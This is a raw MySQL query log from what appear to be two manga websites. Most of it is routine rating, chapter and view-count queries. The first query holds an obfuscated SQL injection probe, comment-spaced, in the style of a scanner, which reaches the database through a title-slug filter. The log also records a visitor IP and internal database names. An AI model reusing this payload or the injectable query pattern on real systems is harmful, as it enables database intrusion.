mangauser@localhost on u317079482_mangacherri_2 using Socket 330645926 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\')%A%N%d%/%*%*%/%5%9%0%2%=%(%\'%~%\'%|%|%(%s%e%L%e%c%T%/%*%*%/%C%a%S%e%/%*%*%/%5%9%0%2%/%*%*%/%W%H%E%n%/%*%*%/%5%9%0%2%/%*%*%/%t%H%e%N%/%*%*%/%1%/%*%*%/%e%l%s%E%/%*%*%/%0%/%*%*%/%E%n%d%/%*%*%/%F%R%o%m%/%*%*%/%r%d%B%$%D%A%T%a%b%A%S%e%)%|%|%\'%~%\'%)-- -' 260225 19:28:44 330645926 Quit 330645927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645927 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330645928 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645929 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645928 Quit 330645929 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10073' and m.active = 1 330645929 Quit 330645930 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645930 Query select * FROM chapters where id = '10073' 330645930 Quit 330645931 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645931 Query select * FROM chapters where manga_id = '219' order by display_priority ASC, id desc 330645931 Quit 330645932 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645932 Query Update chapters set view=view+1 where id = '10073' 330645932 Quit 330645933 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645933 Query select * FROM chapters where id = '10073' 330645933 Quit 330645934 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645934 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10073' and m.active = 1 330645934 Quit 330645935 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645935 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('219', '10073', '47.79.200.42', 'mangaberri.com', '2026-02-26 03:28:44', '2026-02-26 03:28:44') 330645935 Quit 330645936 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645936 Query select * FROM chapter_images where chapter_id = '10073' 330645936 Quit 330645937 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645937 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '219' and m.active = 1 330645937 Quit 330645938 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645938 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='219' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Magic%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330645927 Quit 330645939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645939 Quit 330645940 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330645940 Quit 330645941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330645941 Quit 330645942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330645942 Quit 330645943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330645943 Quit 330645944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330645944 Quit 330645945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330645945 Quit 330645946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330645946 Quit 330645938 Quit 330645947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330645947 Quit 330645948 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330645949 Quit 330645950 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645950 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330645948 Quit 330645950 Quit 330645951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330645951 Quit 330645952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330645952 Quit 330645953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330645953 Quit 330645954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330645954 Quit 330645955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330645955 Quit 330645956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330645956 Quit 330645957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330645957 Quit 330645958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330645958 Quit 330645959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330645959 Quit 330645960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330645960 Quit 330645961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330645961 Quit 330645962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330645962 Quit 330645963 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330645965 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645964 Quit 330645963 Quit 330645965 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645965 Quit 330645966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330645966 Quit 330645967 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645969 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330645968 Quit 330645967 Quit 330645969 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645969 Quit 330645970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330645971 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645970 Quit 330645972 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330645971 Quit 330645972 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330645973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645972 Quit 330645973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330645973 Quit 330645974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330645974 Quit 330645975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330645975 Quit 330645976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330645976 Quit 330645977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330645977 Quit 330645978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330645978 Quit 330645979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330645979 Quit 330645980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330645980 Quit 330645981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330645981 Quit 330645982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330645982 Quit 330645983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330645983 Quit 330645984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330645984 Quit 330645985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330645985 Quit 330645986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330645986 Quit 330645987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330645987 Quit 330645988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330645988 Quit 330645989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330645989 Quit 330645990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330645990 Quit 330645991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330645991 Quit 330645992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330645992 Quit 330645993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330645993 Quit 330645994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330645994 Quit 330645995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330645995 Quit 330645996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330645996 Quit 330645997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330645997 Quit 330645998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330645998 Quit 330645999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330645999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330645999 Quit 330646000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330646000 Quit 330646001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330646001 Quit 330646002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330646002 Quit 330646003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330646003 Quit 330646004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330646004 Quit 330646005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330646005 Quit 330646006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330646006 Quit 330646007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330646007 Quit 330646008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330646008 Quit 330646009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330646009 Quit 330646010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330646010 Quit 330646011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330646011 Quit 330646012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330646012 Quit 330646013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330646013 Quit 330646014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330646014 Quit 330646015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330646015 Quit 330646016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330646016 Quit 330646017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330646017 Quit 330646018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330646018 Quit 330646019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330646019 Quit 330646020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330646020 Quit 330646021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330646021 Quit 330646022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330646022 Quit 330646023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330646023 Quit 330646024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330646024 Quit 330646025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330646025 Quit 330646026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330646026 Quit 330646027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330646027 Quit 330646028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330646028 Quit 330646029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330646029 Quit 330646030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330646030 Quit 330646031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330646031 Quit 330646032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330646032 Quit 330646033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330646033 Quit 330646034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330646034 Quit 330646035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330646035 Quit 330646036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330646036 Quit 330646037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330646037 Quit 330646038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330646038 Quit 330646039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330646039 Quit 330646040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330646040 Quit 330646041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330646041 Quit 330646042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330646042 Quit 330646043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330646043 Quit 330646044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330646044 Quit 330646045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330646045 Quit 330646046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330646046 Quit 330646047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330646047 Quit 330646048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330646048 Quit 330646049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330646049 Quit 330646050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330646050 Quit 330646051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330646051 Quit 330646052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330646052 Quit 330646053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330646053 Quit 330646054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330646054 Quit 330646055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330646055 Quit 330646056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330646056 Quit 330646057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330646057 Quit 330646058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330646058 Quit 330646059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330646059 Quit 330646060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330646060 Quit 330646061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330646061 Quit 330646062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330646062 Quit 330646063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330646063 Quit 330646064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330646064 Quit 330646065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330646065 Quit 330646066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330646066 Quit 330646067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330646067 Quit 330646068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330646068 Quit 330646069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330646069 Quit 330646070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330646070 Quit 330646071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330646071 Quit 330646072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330646072 Quit 330646073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330646073 Quit 330646074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330646074 Quit 330646075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330646075 Quit 330646076 Connect mangauser@localhost on u317079482_mangacherri_2 